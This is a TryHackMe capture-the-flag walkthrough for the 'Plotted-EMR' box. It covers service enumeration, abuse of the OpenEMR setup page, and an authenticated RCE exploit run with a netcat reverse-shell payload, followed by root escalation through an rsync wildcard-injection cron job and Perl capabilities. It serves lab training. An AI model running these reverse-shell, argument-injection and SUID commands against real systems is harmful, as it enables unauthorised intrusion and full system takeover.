Plotted-EMR – Walkthrough En | TryHackMe – Write-up

Everything here is plotted!

Plotted-EMR is a hard box from TryHackMe. The initial is very good. You have to think et put the pieces together!!! After, it’s classic privesc. 



Command :

nmap -sV -sC -T5


Nmap shows us 5 open ports. It is necessary for each of them to enumerate them. We’ll start with the FTP service.

FTP enumeration

Access to the FTP service is done with the anonymous account.

You have to look and see .- then and finally download the file you_are_determined.txt with the command :

mget you_are_determined.txt

Reading the file you_are_determined.txt :

cat you_are_determined.txt

We get a clue. There is a service that works with the account admin. Remains to know which one?

Enumeration MariaDB - Mysql

Nmap already gave us the version. We will try to connect to the service with the admin account.

Command :

mysql -u admin -h -P 5900

Access is possible without a password. On the other hand, there is nothing interesting inside the bases.

Web enumeration.

Port 80

dirsearch -u -x 403



We land on a page with a base64 encoded string, apparently.


Same thing in his directory


The two elements are only rabbitholes

dGhpcyBtaWdodCBiZSBhIHVzZXJuYW1l    === this might be a username

aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1kUXc0dzlXZ1hjUQ==  ===


Port 8890

Commande :

dirsearch -u :8890-x 403

We get several interesting directories.



We land on a login page


Vulnerability on Plotted-EMR

By performing a search on Google, it appears that versions, are vulnerable. You have to be authenticated. We must therefore find a way to log in to the interface.

First, we will parse the website again only on /portal this time.

Command :

dirsearch -u :8890/portal -x 403

There is a setup.php page which apparently allows us to set up a new site. After some google research, there is also another page admin.php which gives us other information.

Creation of a new site

This is not a very simple feat to set up. You have to think about and remember the accesses that you have found before. It took me a long time to understand…

You have to put a name to the site and continue


Take the choice: Have setup create the database


And finally we arrive at the configuration page of the new site.

Les informations à modifier :


server host :

Server Port: 5900

Login Name: newuser

Password: whatever you want

Name for Root Account: admin ( this is the account with which we connected to the sql database )


Initial User: newsadmin

Initial User Password: whatever you want


Be careful, after clicking on continue, it can take up to 1 minute to get to the next step.


Access to the new site

Initial foothold

Now that we have identifiers to connect to the OpenEmr application. It is possible to use the available exploits that allow you to obtain an RCE.

Exploit to use :

Line 66 needs to be changed. You have to put the name of the new site.


Command to launch the exploit :

python2.7 -u admin -p password -c ‘rm f;mkfifo f;cat f|/bin/sh -i 2>&1|nc 1234 > f’


Enumération local - cron task - elevation dofprivilege 1

Linpeas shows us a scheduled task that runs every minute.

There is a wildcard in the command line. This can be used to elevate privileges. As the script will save all the elements ( * ) present in config. We will create a file in this folder which will force rsync to execute the command that we insert.

Command :

cd /var/www/html/portal/config

echo “cp /bin/bash /home/plot_admin/ shell; chmod +s /home/plot_admin/shell” >

touch — “-e sh”

Once the scheduled task has been executed, you must go to the /home/plot_admin folder and execute the new bash.

Command :

./shell -p


Privilege escalation - capabilities

Linpeas had already shown it. Perl has capabilities. The website gtfobins explains how to elevate privileges to root.

Command : 

getcap -r / 2>/dev/null

Commande original de gtfobins : 

./perl -e ‘use POSIX qw(setuid); POSIX::setuid(0); exec “/bin/sh”;’

Commande modifiée : 

/usr/bin/perl -e ‘chmod 7777, “/bin/bash”‘

/bin/bash -p



That’s all folks

Thank you for taking the trouble to come to the site to read this Write Up

I hope he has more of you and that he taught you new things.

Feel free to leave a comment or share this article.